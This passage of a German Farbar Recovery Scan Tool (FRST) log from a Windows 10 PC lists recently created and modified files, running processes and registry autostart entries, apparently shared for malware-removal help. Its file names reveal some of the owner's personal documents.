2022-07-14 17:49 - 2022-07-14 17:49 - 002260480 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000640512 _____ C:\Windows\system32\SettingSyncDownloadHelper.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000288768 _____ C:\Windows\system32\Windows.Management.InprocObjects.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000061952 _____ C:\Windows\system32\printticketvalidation.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000057344 _____ C:\Windows\system32\APMonUI.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000024576 _____ C:\Windows\system32\WsdProviderUtil.dll
2022-07-14 17:44 - 2022-07-14 17:44 - 000000000 ___HD C:\$WinREAgent
2022-07-13 14:31 - 2022-07-13 14:31 - 000328985 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58 (1).jpeg
2022-07-13 14:31 - 2022-07-13 14:31 - 000171434 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58.jpeg
2022-07-13 14:29 - 2022-07-13 14:29 - 000116599 _____ C:\Users\chris\Downloads\Probeklausur.pdf
2022-07-12 19:16 - 2022-07-12 19:16 - 000193337 _____ C:\Users\chris\Downloads\8104328_2022_Datenschutzrechtliche Einwilligung_vom_12.07.2022_20220712191654.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000076728 _____ C:\Users\chris\Downloads\8104328_2022_Nr.003_Kontoauszug_vom_31.03.2022_20220712191454.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000074601 _____ C:\Users\chris\Downloads\8104328_2022_Nr.001_Kontoauszug_vom_31.01.2022_20220712191449.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000073937 _____ C:\Users\chris\Downloads\8104328_2022_Nr.002_Kontoauszug_vom_28.02.2022_20220712191452.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000067892 _____ C:\Users\chris\Downloads\8104328_2022_Nr.004_Kontoauszug_vom_29.04.2022_20220712191457.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000080969 _____ C:\Users\chris\Downloads\8104328_2022_Nr.005_Kontoauszug_vom_31.05.2022_20220712191347.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000074623 _____ C:\Users\chris\Downloads\8104328_2022_Nr.006_Kontoauszug_vom_30.06.2022_20220712191345.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000060149 _____ C:\Users\chris\Downloads\8104328_2022_Ihr Rechnungsabschluss_vom_30.06.2022_20220712191341.pdf
2022-07-12 16:32 - 2022-07-12 16:33 - 002107659 _____ C:\Users\chris\Documents\IMG_20220712_0001.pdf
2022-07-12 16:26 - 2022-07-12 16:26 - 000282547 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-11 at 21.46.27.jpeg
2022-07-12 11:18 - 2022-07-12 11:18 - 000259752 _____ C:\Users\chris\Downloads\aufgaben_kap5.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000258142 _____ C:\Users\chris\Downloads\aufgaben_kap2.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000230124 _____ C:\Users\chris\Downloads\aufgaben_kap3.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000223671 _____ C:\Users\chris\Downloads\aufgaben_kap1.pdf
2022-07-12 11:17 - 2022-07-12 11:17 - 000227308 _____ C:\Users\chris\Downloads\aufgaben_kap4.pdf
2022-07-11 19:12 - 2022-07-11 19:12 - 000299459 _____ C:\Users\chris\Downloads\Dritter_Hauptsatz.pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000087127 _____ C:\Users\chris\Downloads\Studienverlaufsbescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000073060 _____ C:\Users\chris\Downloads\BAföG Bescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000072760 _____ C:\Users\chris\Downloads\Immatrikulationsbescheinigung [PDF] (9).pdf
2022-07-10 17:01 - 2022-07-10 17:02 - 000319960 _____ C:\Users\chris\Documents\Perso_2.pdf
2022-07-07 19:16 - 2022-07-07 19:16 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvortrage_W3-Physik_bioinspirierter_diskreter_Systeme147.pdf
2022-07-06 21:22 - 2022-07-06 21:22 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvorträge W3-Physik bioinspirierter diskreter Systeme[147].pdf
2022-07-05 15:43 - 2022-07-05 15:44 - 000105989 _____ C:\Users\chris\Downloads\Super-PIN.pdf
2022-07-05 15:42 - 2022-07-05 15:42 - 000000754 _____ C:\Users\chris\Desktop\Dokumente - Verknüpfung.lnk
2022-07-05 14:48 - 2022-07-05 14:51 - 002613332 _____ C:\Users\chris\Documents\IMG_20220705_0001.pdf
2022-07-04 15:32 - 2022-07-04 15:35 - 002807761 _____ C:\Users\chris\Documents\IMG_20220704_0002.pdf
2022-07-04 15:18 - 2022-07-04 15:24 - 002778650 _____ C:\Users\chris\Documents\IMG_20220704_0001.pdf
2022-07-03 19:55 - 2022-07-03 19:55 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Fek
2022-07-03 19:54 - 2020-08-18 04:51 - 000000000 ____D C:\Users\chris\Documents\WIN64
2022-07-03 18:32 - 2022-07-03 18:32 - 000176776 _____ C:\Users\chris\Downloads\Thermodynamik (1).pdf
2022-07-03 18:30 - 2022-07-03 18:30 - 000176789 _____ C:\Users\chris\Downloads\Thermodynamik.pdf
2022-07-03 17:37 - 2022-07-03 17:37 - 000078801 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian (1).pdf
2022-07-01 21:42 - 2022-07-01 21:42 - 000000000 ____D C:\Windows\SysWOW64\ncp
2022-07-01 21:42 - 2022-06-15 09:28 - 000100128 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter.sys
2022-07-01 21:41 - 2022-07-20 22:19 - 000000000 ____D C:\Users\Public\Speedup Sessions
2022-07-01 21:41 - 2022-07-14 23:18 - 000001236 _____ C:\Users\Public\Desktop\Avira.lnk
2022-07-01 21:41 - 2022-07-14 18:27 - 000003478 _____ C:\Windows\system32\Tasks\Avira_Security_Update
2022-07-01 21:41 - 2022-07-01 21:41 - 005601064 _____ (Avira Operations GmbH & Co. KG) C:\Users\chris\Downloads\avira_en_sptl1_1567964500-1646663480__phpws-spotlighttrialflow3-control.exe
2022-07-01 21:41 - 2022-07-01 21:41 - 000003778 _____ C:\Windows\system32\Tasks\AviraSystemSpeedupVerify
2022-07-01 21:41 - 2022-07-01 21:41 - 000002818 _____ C:\Windows\system32\Tasks\Avira_Security_Systray
2022-07-01 21:41 - 2022-07-01 21:41 - 000000000 ____D C:\Program Files\Avira
2022-07-01 21:41 - 2022-06-30 11:17 - 000202584 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_filesystem_filter.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000193304 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_process_monitor.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000047560 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_traverse.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000024024 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_elam.sys
2022-07-01 21:41 - 2022-06-21 17:57 - 000230520 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\BdSentry.sys
2022-06-30 19:24 - 2022-06-30 19:24 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54 (1).jpeg
2022-06-30 19:03 - 2022-06-30 19:03 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54.jpeg
2022-06-30 18:12 - 2022-06-30 18:12 - 000146362 _____ C:\Users\chris\Downloads\u11 (5).pdf
2022-06-29 20:09 - 2022-06-29 20:09 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Yabukaradoo
2022-06-29 19:51 - 2022-06-29 19:51 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Laplace
2022-06-29 18:16 - 2022-06-29 18:16 - 000078535 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian.pdf
2022-06-29 12:28 - 2022-06-29 12:28 - 000146362 _____ C:\Users\chris\Downloads\u11 (4).pdf
2022-06-27 14:45 - 2022-06-27 14:47 - 002934336 _____ C:\Users\chris\Documents\IMG_20220627_0001.pdf
2022-06-26 16:46 - 2022-06-26 16:46 - 000000223 _____ C:\Users\chris\Desktop\Democracy 4.url
2022-06-26 12:40 - 2022-06-26 12:40 - 000146362 _____ C:\Users\chris\Downloads\u11 (3).pdf
2022-06-26 12:12 - 2022-06-26 12:12 - 000100026 _____ C:\Users\chris\Downloads\u10 (2).pdf
2022-06-22 21:49 - 2022-06-22 21:49 - 000100026 _____ C:\Users\chris\Downloads\u10 (1).pdf
2022-06-22 21:47 - 2022-06-22 21:47 - 000146362 _____ C:\Users\chris\Downloads\u11 (2).pdf
2022-06-22 19:14 - 2022-06-22 19:14 - 021972442 _____ C:\Users\chris\Downloads\7_Magnetische_Eigenschaften_von_Ferromagnetika (3).pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\fernabsatz_1741976447.pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\1741976447_c32aedbc-9e90-466b-ba75-004873f96082.pdf

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-21 12:17 - 2020-12-10 18:51 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-21 12:15 - 2020-12-10 20:14 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-21 12:08 - 2022-04-19 20:35 - 000000000 ____D C:\Users\chris\AppData\Local\blow_the_leaves_away
2022-07-21 11:57 - 2020-12-10 18:58 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-21 11:40 - 2020-12-10 18:34 - 000000000 ___RD C:\Users\chris\OneDrive
2022-07-21 11:39 - 2022-03-02 16:07 - 000000000 ____D C:\Users\chris\AppData\Local\Oculus
2022-07-20 22:47 - 2022-03-02 17:27 - 000000000 ____D C:\Program Files\Oculus
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\AppReadiness
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-20 22:46 - 2020-11-19 00:34 - 000000000 ____D C:\Windows\system32\SleepStudy
2022-07-20 22:30 - 2020-12-11 01:24 - 001822948 _____ C:\Windows\system32\PerfStringBackup.INI
2022-07-20 22:30 - 2019-12-07 16:50 - 000781196 _____ C:\Windows\system32\perfh007.dat
2022-07-20 22:30 - 2019-12-07 16:50 - 000166520 _____ C:\Windows\system32\perfc007.dat
2022-07-20 22:30 - 2019-12-07 11:13 - 000000000 ____D C:\Windows\INF
2022-07-20 22:25 - 2022-06-20 20:11 - 001183032 _____ C:\Windows\system32\rtp.db
2022-07-20 22:25 - 2020-12-11 01:18 - 000807280 _____ C:\Windows\system32\wpbbin.exe
2022-07-20 22:25 - 2020-12-11 01:18 - 000768408 _____ C:\Windows\system32\AsusUpdateCheck.exe
2022-07-20 22:25 - 2020-12-11 01:18 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-20 22:25 - 2020-11-19 01:34 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-07-20 22:25 - 2019-12-07 11:03 - 000786432 _____ C:\Windows\system32\config\BBI
2022-07-20 22:24 - 2021-04-16 19:38 - 000000000 ____D C:\Users\Lisa\AppData\LocalLow\Temp
2022-07-20 12:32 - 2020-12-10 20:02 - 000000000 ____D C:\Users\chris\AppData\Local\D3DSCache
2022-07-20 12:15 - 2020-12-10 18:52 - 000002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-19 13:21 - 2020-12-10 18:31 - 000000000 ____D C:\Users\chris
2022-07-19 00:06 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Roaming\discord
2022-07-18 23:51 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Local\Discord
2022-07-18 12:19 - 2021-01-05 14:23 - 000004232 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1609849433
2022-07-18 12:19 - 2021-01-05 14:23 - 000001389 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera-Browser.lnk
2022-07-18 12:14 - 2022-03-02 17:29 - 000000000 ____D C:\ProgramData\Oculus
2022-07-17 21:49 - 2019-12-07 11:03 - 000000000 ____D C:\Windows\CbsTemp
2022-07-17 21:40 - 2022-05-08 20:33 - 000000000 ____D C:\Windows\Minidump
2022-07-17 17:43 - 2020-11-19 01:37 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-17 17:43 - 2020-11-19 01:37 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-15 12:03 - 2022-03-17 15:03 - 000000000 ____D C:\Users\chris\Downloads\DS4Windows
2022-07-15 11:22 - 2022-03-17 15:14 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2022-07-15 11:22 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2022-07-15 11:21 - 2022-03-17 15:06 - 000000000 ____D C:\Users\chris\AppData\Roaming\DS4Windows
2022-07-15 11:21 - 2021-09-09 14:12 - 000000000 ____D C:\Users\chris\AppData\Local\Ubisoft Game Launcher
2022-07-15 11:16 - 2021-01-12 20:22 - 000004240 _____ C:\Windows\system32\Tasks\Opera GX scheduled Autoupdate 1610475719
2022-07-15 11:16 - 2021-01-12 20:21 - 000001434 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Browser Opera GX.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000001345 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000000000 ___RD C:\Users\chris\AppData\Local\PCHealthCheck
2022-07-14 20:50 - 2020-11-19 00:34 - 000258000 _____ C:\Windows\system32\FNTCACHE.DAT
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\PrintDialog
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SystemResources
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\setup
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\oobe
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\es-MX
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\DDFs
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellExperiences
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellComponents
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\bcastdvr
2022-07-14 19:18 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2022-07-14 18:50 - 2020-11-19 01:34 - 000000000 ____D C:\Windows\system32\Drivers\wd
2022-07-14 18:50 - 2019-12-07 11:03 - 000032768 _____ C:\Windows\system32\config\ELAM
2022-07-14 18:27 - 2021-04-19 21:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2022-07-14 17:49 - 2020-11-19 01:36 - 003010560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2022-07-14 17:44 - 2020-12-10 18:36 - 000000000 ____D C:\Windows\system32\MRT
2022-07-14 17:42 - 2020-12-10 18:36 - 146546848 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2022-07-14 11:45 - 2020-11-19 01:36 - 000003756 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-14 11:45 - 2020-11-19 01:36 - 000003632 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2022-07-13 18:13 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\LiveKernelReports
2022-07-12 20:27 - 2020-12-16 21:04 - 000000000 ____D C:\Users\chris\AppData\Local\CrashDumps
2022-07-12 17:40 - 2021-12-12 18:38 - 000003584 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:34 - 000003376 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:31 - 000002395 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-07 18:59 - 2021-01-05 14:23 - 000004464 _____ C:\Windows\system32\Tasks\Opera scheduled assistant Autoupdate 1609849435
2022-07-05 19:31 - 2020-12-10 21:55 - 000000000 ____D C:\ProgramData\boost_interprocess
2022-07-04 16:51 - 2020-12-14 13:53 - 000000000 ____D C:\ProgramData\CanonIJPLM
2022-07-03 19:36 - 2022-05-24 22:29 - 000000000 ____D C:\Users\chris\AppData\Roaming\RenPy
2022-07-01 21:42 - 2020-12-10 19:56 - 000000000 ____D C:\ProgramData\Avira
2022-07-01 21:42 - 2019-12-07 11:14 - 000000000 ___HD C:\Windows\ELAMBKUP
2022-07-01 21:41 - 2021-01-05 14:22 - 000000000 ____D C:\Program Files (x86)\Avira
2022-07-01 21:31 - 2020-12-10 18:37 - 000803176 _____ (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2022-06-29 20:27 - 2022-06-17 20:37 - 000000000 ____D C:\Users\chris\AppData\Roaming\dryad_quest
2022-06-26 17:17 - 2021-03-06 15:41 - 000000000 ____D C:\Users\chris\Documents\My Games
2022-06-26 16:46 - 2021-03-05 14:55 - 000000000 ____D C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-06-26 16:43 - 2020-12-10 22:11 - 000000000 ____D C:\ProgramData\Riot Games
2022-06-26 10:01 - 2020-11-19 01:38 - 000000000 ____D C:\ProgramData\Packages
2022-06-22 14:44 - 2022-02-01 11:45 - 000001423 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly.lnk
2022-06-22 14:44 - 2022-02-01 11:45 - 000001415 _____ C:\Users\chris\Desktop\Grammarly.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2022-06-08 21:06 - 2022-06-08 21:06 - 000008412 _____ () C:\Users\chris\AppData\Local\recently-used.xbel

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         
Addition:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 21-07-2022
durchgeführt von chris (Administrator) auf DESKTOP-5G99FIR (21-07-2022 12:20:15)
Gestartet von C:\Users\chris\Downloads\FRST
Geladene Profile: chris
Plattform: Microsoft Windows 10 Home Version 21H1 19043.1826 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Opera
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe ->) (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3Svc64.exe
(C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\SentryEye.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRRedir.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServer_x64.exe
(C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe ->) (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\TabletDriver.exe
(D:\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) D:\Synapse3\UserProcess\Razer Synapse Service Process.exe
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <5>
(Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera GX\88.0.4412.85\opera_autoupdate.exe <2>
(services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe
(services.exe ->) (Canon Inc. -> ) C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(services.exe ->) (Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (nordvpn s.a. -> TEFINCOM S.A.) C:\Program Files\NordVPN\nordvpn-service.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc) C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) D:\Synapse3\Service\Razer Synapse Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(svchost.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe
(svchost.exe ->) (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(svchost.exe ->) (Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe <2>
(wbem\unsecapp.exe ->) (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9277520 2020-12-10] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX2] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX2\CNMNSST2.exe [279240 2016-12-09] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [Avira System Speedup User Starter] => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [332848 2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-07] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Grammarly] => C:\Users\chris\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe [946136 2022-06-15] (Grammarly, Inc. -> )
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [MicrosoftEdgeAutoLaunch_0A1E394B2107F9944ED3CB9C6839BC54] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3601824 2022-07-14] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Discord] => C:\Users\Lisa\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Lisa\AppData\Local\Microsoft\Teams\Update.exe [2454184 2021-05-25] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Opera GX Browser Assistant] => C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (Keine Datei)
HKU\S-1-5-18\...\Run: [Synapse3] => D:\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524680 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
